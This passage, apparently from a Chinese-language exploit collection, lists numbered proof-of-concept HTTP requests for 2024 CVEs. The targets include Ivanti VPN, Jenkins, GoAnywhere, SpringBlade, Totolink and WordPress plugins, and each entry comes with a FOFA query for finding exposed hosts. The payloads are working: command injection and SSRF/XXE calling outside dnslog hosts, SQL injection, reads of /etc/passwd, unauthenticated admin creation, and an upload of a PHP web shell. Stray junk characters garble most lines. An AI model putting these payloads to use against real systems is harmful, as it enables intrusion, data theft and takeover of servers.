- q! S- b5 ^/ C/ a: z- cCVE-2024-0195) y  n5 Q3 F' G+ c2 c0 V
FOFA:app="SpiderFlow"( R2 N! i+ `& O* H0 S0 p- A+ g
POST /function/save HTTP/1.1
2 y- c! W& F8 PHost: 192.168.40.130:8088
. f& P! Q1 n) \  [# {# B9 w* XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( t7 Z# U9 _/ fConnection: close4 k+ @; v  r5 A- M. E3 g& x
Content-Length: 121+ v$ z6 y4 T! o& p0 f* o
Accept: */*: e# R  n" L* c$ q9 l5 y6 T# E
Accept-Encoding: gzip, deflate
0 [# ~0 N9 x2 f! s' [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
; N/ i. n: ^$ a/ q2 v( w' OContent-Type: application/x-www-form-urlencoded; charset=UTF-8
/ J4 H9 |; d* XX-Requested-With: XMLHttpRequest; R6 r8 O2 F) i( O
5 {1 V! l8 R0 Q9 m7 i" B
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
$ |8 L  D+ p* i/ f! d& a  J; d+ E0 x$ @" H* J/ o+ z6 z3 @

3 n& q4 y4 T, L99. Ncast盈可视高清智能录播系统busiFacade RCE
8 G8 C' O2 `# E# t! e8 }CVE-2024-0305
# Q5 D$ q! k+ w) @2 p5 DFOFA:app="Ncast-产品" && title=="高清智能录播系统"
! @. C( e8 t, H2 U6 NPOST /classes/common/busiFacade.php HTTP/1.1
# |, |; m8 S8 [& P- ?. B. kHost: 192.168.40.130:8080
8 \8 m6 Q4 z" ~* O7 ^, |- U6 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) c7 Y% Y  v/ z9 z$ C# H6 i8 K$ C2 `Connection: close
# M, `7 ?6 A) C. |2 L4 g  XContent-Length: 154
+ T2 E6 v- u, q3 O* y# @/ SAccept: */*
: m1 ]* F; I4 J+ H, ]$ IAccept-Encoding: gzip, deflate
* I. ]( }0 |! Q, X# f$ OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% _! |7 |$ D% F
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
; Y8 F7 a: x5 ~, i5 [) N5 YX-Requested-With: XMLHttpRequest
2 [  R; b2 |. m# ?
2 O" O/ ~! e3 ^$ p0 ~: ^% D%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D" Q  R$ x- R/ {* \

0 d' x* \# e8 {) `: x" A
0 X& V7 A! `! J100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 f1 S5 V* [+ m2 k1 D0 i: cCVE-2024-0352
  K! A0 a) u0 U+ P7 L% M3 w: mFOFA:icon_hash="874152924"  ^& y9 k7 e% u9 w  b( M5 e
POST /api/file/formimage HTTP/1.1
7 Z! ?! P- I$ k- o/ _9 DHost: 192.168.40.130' E% P8 w+ `: P& D2 Q# \
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36  G* w; v+ p" v% Q
Connection: close
$ e/ {% y: F; e9 M! ZContent-Length: 2014 {7 n1 p& m7 K. L! h
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei# v, v& P- k" w0 c3 G
Accept-Encoding: gzip
3 r0 a+ P0 L. g2 n$ Q+ c0 \
& D3 V" d8 @: S# \------WebKitFormBoundarygcflwtei& `7 W2 _" H5 w: q
Content-Disposition: form-data; name="file";filename="IE4MGP.php"* o6 M0 B! }6 ~; e" u' R2 o# c
Content-Type: application/x-php; ~6 s  S7 l0 z; u

/ {* B3 I7 ~7 M2ayyhRXiAsKXL8olvF5s4qqyI2O
' M" j; ?1 P. Y0 B------WebKitFormBoundarygcflwtei--
5 N1 S+ g1 j& N3 y" K$ F" I6 i' R/ ]% Z( F+ u6 a
7 m" X8 y. w: X8 S, @# E
101. ivanti policy secure-22.6命令注入/ [" j" R& k2 z' R) K9 G0 p6 D9 D& M# }
CVE-2024-21887/ C# n1 V# g: x
FOFA:body="welcome.cgi?p=logo"/ z$ \  {5 _  o2 u; U- U" i) _
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1+ v2 }: r* `3 x9 @
Host: x.x.x.xx.x.x.x
: a) L9 ]" f& Z; u- x3 QUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 x: A$ v6 V; n5 h3 W& fConnection: close1 Z* R% u0 g* n- V7 n3 z# G
Accept-Encoding: gzip
% [* [) p; y( g; F: R$ E6 N
8 Q# d' x& v$ s, o4 B- n( S; T  h: n: {2 r9 f
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
6 G4 ?% R& z# `; NCVE-2024-21893
, K5 k  I) v) ], q2 X. B( EFOFA:body="welcome.cgi?p=logo"
6 ~; N6 a# c3 R# mPOST /dana-ws/saml20.ws HTTP/1.19 j3 Z( |$ \1 ~! D/ K  L
Host: x.x.x.x7 i0 f4 l% f! e9 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36# ]# j/ J9 ]" q4 S' J! H" C2 f7 i
Connection: close' V+ e6 [* C; M
Content-Length: 792
8 R( w* `+ [& y; X/ F, n' XAccept-Encoding: gzip; H7 R- J6 u* E( r% v0 m  T
. \  Q1 z7 z: j. ?8 K: o' q) _
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
" `5 l3 x+ r, V& V
- ^; \- d) L& c9 `7 o+ O  X103. Ivanti Pulse Connect Secure VPN XXE! E& n5 `! D3 g( l
CVE-2024-22024
; v. b7 v3 Q7 s; D. O% R& T# ?FOFA:body="welcome.cgi?p=logo". ~4 ]- M8 l) N; g1 C
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
" g1 U: ~! b; [/ y+ p' FHost: 192.168.40.130:1112 C( a: E7 e! Z6 {
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.365 a$ @# H0 e% S) ]9 r
Connection: close& o7 h  c8 Q9 |2 b. {9 y' w; }0 B
Content-Length: 204
* k6 \8 I/ \2 a8 ^! SContent-Type: application/x-www-form-urlencoded
5 Q9 U5 o% T8 rAccept-Encoding: gzip% n. L/ F1 R# I" x' v

7 H0 j! i1 @% B4 J% p7 ^SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
4 K! Y  Y: k* P1 n% G9 M
" z4 m! C, a7 S8 ^' a
( J5 {1 \8 E4 Y2 f' Z2 t! S# l其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
4 z" m8 j4 P9 ]) X& ~0 Q) b0 M<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r># v! K& K. V* F: q( D

' k- y: M7 ^* |* }! U
$ t$ d; T) d' i) Q( Z( n  o104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露# u6 M/ `6 z2 [4 C# @4 Q. d- N
CVE-2024-05696 W; z" Y+ g' u6 `! G' x1 v4 q
FOFA:title="TOTOLINK"& o* U9 o* Z" c7 ^
POST /cgi-bin/cstecgi.cgi HTTP/1.1
- a2 D, _5 y  x! [$ }% B1 s: AHost:192.168.0.18 V0 |" O/ d) b" {# c
Content-Length:41" D* Y/ o; a6 V7 H0 P' c
Accept:application/json,text/javascript,*/*;q=0.01
2 f# H/ {# N2 S8 e6 Y! XX-Requested-with: XMLHttpRequest
( j" ?3 c$ E' H! x) rUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.364 X0 y. X+ S3 c
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
5 B2 L; N$ M0 O7 qOrigin: http://192.168.0.13 d) f; [' k" W
Referer: http://192.168.0.1/advance/index.html?time=1671152380564- Y) H6 K0 m6 j: S! ?
Accept-Encoding:gzip,deflate
) E+ s9 k* F- _5 Y2 {. D# |Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
8 Y+ a8 R: n) P6 cConnection:close
. s. }- t' P# n8 u1 b9 L
0 `. _/ R+ Y/ f/ C{1 Q2 {8 z+ s' p. w4 B# c
"topicurl":"getSysStatusCfg",
$ E% m) _1 Z( L& R" ^+ |"token":""
4 O2 d( V# L1 ^6 d* W1 d# S}
- D. \0 I! f# S8 q8 ]
$ S8 _0 q, s$ b- y105. SpringBlade v3.2.0 export-user SQL 注入
0 r% g( K* f; ]. T8 ^! }# aFOFA:body="https://bladex.vip"
3 z' @' c/ g& W! v( L$ N* O! Whttp://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
9 H2 [6 o! M  L
2 u( a0 z0 @: v( Z# {106. SpringBlade dict-biz/list SQL 注入& a. K8 e8 e! J3 j% Y2 I8 C+ y
FOFA:body="Saber 将不能正常工作"; o: N  R9 V8 |$ W- \, E
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1# {( r1 Z# V; O1 ~: O
Host: your-ip6 M& m. T7 B: P( ^
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- ]# H7 |  t8 }) o! ~& I; k. m9 _( m0 gBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A) E( e5 d0 d4 A) [6 P4 x! P3 |- `
Accept-Encoding: gzip, deflate
3 E1 g3 Q- H! S7 u, i$ d6 M! mAccept-Language: zh-CN,zh;q=0.9
0 W. o* X& P4 t5 ^5 IConnection: close$ f/ j5 m& h8 M

3 L: @- U' j' f3 f9 k: K- i! d
7 n( d3 \$ z# u6 E3 h8 u107. SpringBlade tenant/list SQL 注入) y2 o. z$ a& K6 I  r2 m; W
FOFA:body="https://bladex.vip"  A6 {* u8 p# Q# ^' t2 R* s1 ^
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
5 |' q: i3 b8 j' e, KHost: your-ip
$ U$ |  o6 c& S3 i% p9 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36) T# e  u' e1 J" q, C& m7 X
Blade-Auth:替换为自己的
/ |" M+ z& L, q$ G: X/ i! SConnection: close2 L5 F+ S# I3 L' c: H4 L+ }$ V
# {2 R& r9 H- |5 ?" l
6 p$ f1 J0 U; W  w4 Q4 P
108. D-Tale 3.9.0 SSRF
  w- n- [( J" i, L  r$ a: i" RCVE-2024-21642
. e# _$ H) s- W( N, j; Z; c+ MFOFA:"dtale/static/images/favicon.png"" i& y# E3 {$ x% \
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
( z: J( g6 @; b4 H, g* W7 LHost: your-ip/ L! A' Z( B* R& k2 S
Accept: application/json, text/plain, */*, h3 m3 R  v/ ]6 G
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
8 S* ]& `, {( w* r; aAccept-Encoding: gzip, deflate
2 k* @, q5 z% ?  q0 wAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
+ d' K) k2 f( g' S7 PConnection: close0 Z: A4 T! r: n, [1 D2 F$ j7 ]% |

2 O6 V6 Y2 a; c0 ?  O4 b+ D3 l! {! v& U
109. Jenkins CLI 任意文件读取
1 p' j2 ~6 A" A% R1 S- mCVE-2024-238978 x+ g6 S+ e3 P. O' l
FOFA:header="X-Jenkins"
% e) m# u- \1 ?: I7 M1 c2 n7 aPOST /cli?remoting=false HTTP/1.1
* b$ D3 D4 Z6 ]Host:
7 l$ D) U. [& g% X4 OContent-type: application/octet-stream
& k$ t, o. u# `8 x3 T. ASession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
( R3 R/ a* ]0 l: ^* CSide: upload; x7 }4 a3 b  @( [5 z
Connection: keep-alive4 d' i' N1 e- }2 W; u9 N3 x
Content-Length: 163
) p. J0 l- w1 A6 l* @/ G$ a/ d: `! l; W4 d6 s
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03': k. J9 y$ m# p5 \4 U  A
" K1 n, c8 K( r' l

! r  h# b( ~7 \9 [& lPOST /cli?remoting=false HTTP/1.1+ U4 w, e1 o  @8 P
Host:4 C; v* O- k$ E7 R
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92" n. y- J# x$ a* c# ^2 s. k
download- N. D9 J  @1 K9 K/ N0 G1 Z, N& _
Content-Type: application/x-www-form-urlencoded7 W* g" P1 A- n" f
Content-Length: 0" \$ o" \8 o8 n3 {4 ^
2 S1 l; ]5 V- ~4 @

/ Y+ l! D5 g! h& E, ]ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
2 x$ w' o6 l* `) {2 ~$ i5 Djava -jar jenkins-cli.jar help( _; w: T" c! f% p0 A3 M) p
[COMMAND]% r+ ^( t: \4 p2 t( m2 ?+ r
Lists all the available commands or a detailed description of single command.
6 b" P0 L$ t, O6 _. o5 H" h( r: n COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
6 B0 m- q& d% ?" r! w9 W0 q3 Q+ J. |. |% L- ~
: i9 T3 g/ O9 _, Z1 {5 a0 i& x/ k
110. Goanywhere MFT 未授权创建管理员4 J9 {! k0 ]$ V7 F* o
CVE-2024-0204
1 ~  e1 ~, v( ^( ~5 XFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"4 ?' d) [' B7 b" p- M
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
) T* D/ C5 F" v! @/ d' }* I/ s8 LHost: 192.168.40.130:8000
! w) W" W& [5 [" {5 gUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
$ a: m- m1 x; Q- Q/ v7 V% ]Connection: close7 J, i; V1 _, r5 R- V
Accept: */*
. u8 k8 t0 W* ]) f9 O  c- YAccept-Language: en* {( e5 w; ~) n5 g# {
Accept-Encoding: gzip; v5 r& [, M2 S- @  L
  s! X' f. }  q! k& G

) u; n( R- O3 M9 j+ L/ ]( t0 l111. WordPress Plugin HTML5 Video Player SQL注入
+ P5 b0 y* r/ }9 ~/ y  W. @CVE-2024-1061
0 j! B1 t9 F# }' ?" l- \$ `FOFA:"wordpress" && body="html5-video-player"
. L: A& ]: h7 `* k* \! hGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.12 u% d6 v9 ~( }' E
Host: 192.168.40.130:112
4 C9 l8 N0 X4 @9 p$ |3 f5 TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36: f$ W& P( s& U9 \
Connection: close
/ A8 [; |2 m8 O+ WAccept: */*3 }3 J3 B, T& H9 Y- ?! Q
Accept-Language: en
# j# f. G; z4 K& K1 w3 k/ bAccept-Encoding: gzip
. u. D0 D  r( x3 n& ^1 ]+ O" r
# X0 x- Z; P, L" |
. Z; A8 }( t  r' n# d112. WordPress Plugin NotificationX SQL 注入
4 \" m. e1 g* U" A4 ?# N' sCVE-2024-16985 S5 a2 q9 A" {" ]' [  b& X& t
FOFA:body="/wp-content/plugins/notificationx"$ \7 Y0 i! Q$ ~$ j, G1 `, b
POST /wp-json/notificationx/v1/analytics HTTP/1.1
7 R9 K9 M0 f* i, F0 ?* Z& xHost: {{Hostname}}
9 G' Y3 K; ~3 q: @Content-Type: application/json7 T0 r1 z& Q5 r( B. c* w5 N

& ]9 w* A# f) E0 B3 g. N{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
" E7 q  Y2 H& c% n1 x6 Y8 X
' c; c3 F7 {! B: n9 a8 q, N% Y( q1 R0 Z6 c' M4 q
113. WordPress Automatic 插件任意文件下载和SSRF/ Y* i& {# t1 s1 z7 ?1 @
CVE-2024-27954: J4 Z( G  r6 E8 h( ?. G
FOFA:"/wp-content/plugins/wp-automatic"- U6 {, W3 e% c6 x- l, J. V
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
7 O( @* \5 F, iHost: x.x.x.x
) ~# R2 V% C: c9 y+ ]User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
+ {. S' r5 N' }7 w& \" ~Connection: close
8 `! ~# c' t0 e& b5 d4 w7 w* X  GAccept: */*
. Y3 D+ b1 c/ j8 {: d$ dAccept-Language: en
. s* b3 w" f$ M3 N$ ~+ [Accept-Encoding: gzip! S, T6 S! R: K, e2 T& ^2 R+ l/ a

. r/ Z0 K9 E' O! d( R# q& t. G/ H4 X
114. WordPress MasterStudy LMS插件 SQL注入
- \6 X9 z6 h3 M) r' t2 tFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"0 d( V0 @  E! Z# z7 m
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1' f6 [  G  m: [7 Y9 O* U7 i7 |
Host: your-ip
7 |% {' D9 k( {) v9 hUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36& `! ]% E% T1 J0 S. K5 U% U
Accept-Charset: utf-8
' U5 u/ h/ G) i7 c2 g* qAccept-Encoding: gzip, deflate
0 h) X" c9 I  C/ XConnection: close
( k' p, J  E9 ~2 j5 W
" F; X9 Y  |2 f, ~/ j3 U  p! c7 V$ F, c: ^) f  }" U; y# U0 U% z
115. WordPress Bricks Builder <= 1.9.6 RCE
: f, m, q, M, c5 CCVE-2024-25600
1 o/ y8 M, o1 T, hFOFA: body="/wp-content/themes/bricks/"
) T7 y( l+ B4 l/ a( t2 E3 x第一步,获取网站的nonce值
  s, }$ W6 C6 iGET / HTTP/1.1" f1 W6 Z/ }6 p8 t1 ?+ |/ g
Host: x.x.x.x# w$ Q0 P( h; j$ o5 ?1 h
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.362 P: N" i6 t1 B, R( \# a2 H
Connection: close, f/ R1 m9 C' w
Accept-Encoding: gzip
; ~; R3 ?! Y. C) U% i$ P# z  Y' o& e5 @2 W* T

7 F% ~7 g9 b) U8 t* z/ ?9 h  K/ a第二步替换nonce值,执行命令
/ c2 y  C/ K) L5 b: mPOST /wp-json/bricks/v1/render_element HTTP/1.1
& h, Q) u* k# Y7 X1 CHost: x.x.x.x3 P' L/ h! L3 C1 s" |! v
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.363 u8 O+ G& C/ p9 }& X
Connection: close: b* d* ?5 v' y* K7 _3 Q
Content-Length: 3561 R: J" n- d+ @
Content-Type: application/json
4 w3 x7 L+ }% v- _+ D4 R/ ]8 tAccept-Encoding: gzip4 ]) S, U: p0 G$ ?. P
& r$ l! t! \" ~/ s2 p8 L
{$ D- C8 N; [  i% ?0 h
"postId": "1",
$ ]6 E) e2 r9 }. m5 z  "nonce": "第一步获得的值",
6 s7 |9 P+ _4 A( |  "element": {
1 P' O# O/ E7 Y; P0 l: p9 Z    "name": "container",
* i4 B4 o2 T4 x+ c0 e) P5 ~7 O$ C/ u    "settings": {
* L: j2 e$ L& r/ l/ m  `. n      "hasLoop": "true",
6 x- A6 }) f6 h# _7 ?' ^* l; }      "query": {
1 m- o, V! \! W3 x& T        "useQueryEditor": true,
' I* N3 L$ [5 v2 G. [        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
! [' L9 X- n6 h' p* m; C# Y        "objectType": "post": U( G; C' S; ^; G2 H1 [
      }
/ C. t# j0 P- n( T    }. c: M$ O) Y! [  L, w
  }$ p* _* P! A. S% F
}
2 j4 {- }1 x" O. Q0 K! C
8 i$ o$ }8 @4 e: f9 `4 a% v6 I" T. q, q# \( f2 G
116. wordpress js-support-ticket文件上传
3 \! k9 ?: l! Q: O3 j% qFOFA:body="wp-content/plugins/js-support-ticket"
  o1 H8 q( |' ]; _POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.18 a5 ?+ h) o4 a- g/ G# y
Host:
# Z/ h* s8 S3 CContent-Type: multipart/form-data; boundary=--------767099171
$ z5 |& L& _3 Z! I" e; {User-Agent: Mozilla/5.0# ^* R0 \4 G9 h. q- C5 j6 s  b

" D- i3 u- W: T- m----------767099171
) v- `, I* H( x5 k# g$ ?Content-Disposition: form-data; name="action"* t- z* X% u% ~
configuration_saveconfiguration
9 T. ^- b1 i' L( p----------767099171
- V) t$ e8 q+ _8 t7 \4 eContent-Disposition: form-data; name="form_request"
6 c' t& R1 l( d, q: Mjssupportticket
1 P; V+ G, l1 B3 v1 x! M) T----------767099171
2 f; b+ c" N6 j) T* F5 ZContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"3 j0 v* T! z: j- @% Q6 k! G( `( B
Content-Type: image/png
9 D* ^! q# I# g# P2 H5 y----------767099171--
* v% p* A1 J9 L* `' p% r( K* D4 A" `. Z1 v& P# m4 y8 n4 d3 i

# {9 q# I. o) R$ V117. WordPress LayerSlider插件SQL注入$ Q+ i& g: u5 [3 E
version:7.9.11 – 7.10.0+ ^+ a0 @$ s) G9 O& p6 ]- Z3 a9 Z
FOFA:body="/wp-content/plugins/LayerSlider/"
8 o3 c% R7 @4 _+ {GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1- k% [# n6 r3 z/ R# r7 J, j
Host: your-ip
' s# c- _$ f# l3 h0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" V7 K4 X/ W, N: \9 C4 C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.82 E; o. C1 D/ g# V! ?
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! K$ f8 {- w5 m/ g: g5 hAccept-Encoding: gzip, deflate, br
7 `2 y  g! r$ s- v! o% sConnection: close9 p2 t" ~9 Q) G0 a" B/ U
Upgrade-Insecure-Requests: 1
2 [2 @0 `) {$ \/ D
2 z& T, J. W3 _9 i. Q# W) b3 K$ G4 \  m- r4 S
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
6 y4 f1 U" [" ^0 x# rCVE-2024-09391 j1 C) S; V8 E5 J# ]
FOFA:title="Smart管理平台"  B# u3 F  k; `
POST /Tool/uploadfile.php? HTTP/1.1+ s9 g& H! {6 S3 A4 p( o
Host: 192.168.40.130:8443# t* a& d3 d9 A1 E- A% t
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f81 R3 E8 S* P2 }" h) R. U
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0; a- [; U  I1 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 V% H1 [, |* }' \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 L/ |, Z7 t8 a4 r7 }" \
Accept-Encoding: gzip, deflate
; h- S/ Y5 c3 b$ M+ |1 }0 o( ^Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
% ^3 I% c7 Z% A7 L/ tContent-Length: 405
- D. [- [7 q7 @5 P( FOrigin: https://192.168.40.130:84435 q/ _# T7 p; ^4 T
Referer: https://192.168.40.130:8443/Tool/uploadfile.php/ y' i0 z& b  q5 o' S2 N8 V% D4 W
Upgrade-Insecure-Requests: 17 k$ v. P7 o% ?+ y  F" O- ~
Sec-Fetch-Dest: document9 Z5 `: @' [2 ~5 ^
Sec-Fetch-Mode: navigate
4 Z) t; V! @6 Z. o6 P- lSec-Fetch-Site: same-origin
. a# J2 y+ W  c: _5 ]  MSec-Fetch-User: ?1% b: h! }# z! Y3 C2 o% |! Z8 q( U% {1 u
Te: trailers9 {1 o% F; u$ [
Connection: close
8 t: I% |2 Q8 z
$ y, H/ O1 Y7 D( z: Z! `" |-----------------------------139797012227476466340371828874 H: t& K: }$ G# Q7 z$ h* X
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
1 t9 E# z7 M2 k: |6 W' z2 }Content-Type: application/octet-stream
* f( e% p$ {, i: c2 d4 h* T8 W. T2 {5 ~: T, ]9 z
<?php  u. G$ U4 |" I
system($_POST["passwd"]);
  k7 G3 E1 O( h?>
1 l. H# w% G( M" a-----------------------------13979701222747646634037182887/ e" v& `% a9 X0 A, W9 G9 D' x4 j8 [
Content-Disposition: form-data; name="txt_path"
) p6 q: y4 I* A! G+ ~2 \+ k. o
4 \" X" S& ~( p/home/src.php
9 q$ y3 |- c0 _) S; i  V-----------------------------13979701222747646634037182887--
1 ?* n! [; z; x* a
  H* e1 J0 r2 I4 d  r$ Q+ X  `2 n. {% E5 Y/ y1 d( R
访问/home/src.php8 U5 Q' m* q% T, ~8 _9 L
$ m) h& U$ W+ h6 z- e
119. 北京百绰智能S20后台sysmanageajax.php sql注入) |. Q( i# M) |8 g3 o
CVE-2024-1254- F. I: n$ a4 j) t5 k
FOFA:title="Smart管理平台"8 y! F+ V' s% g/ E3 A# p# F
先登录进入系统,默认账号密码为admin/admin
& p: P5 D4 \: q0 YPOST /sysmanage/sysmanageajax.php HTTP/1.11
" |/ o) |8 `% n" R$ RHost: x.x.x.x  X" \: Y1 P: L% _6 Z& f- {5 k
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
0 v+ e0 U% L$ h; O0 V5 r& cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
4 ]* P8 k/ `) x" fAccept: */*
& p5 u2 O% y" K9 i) cAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
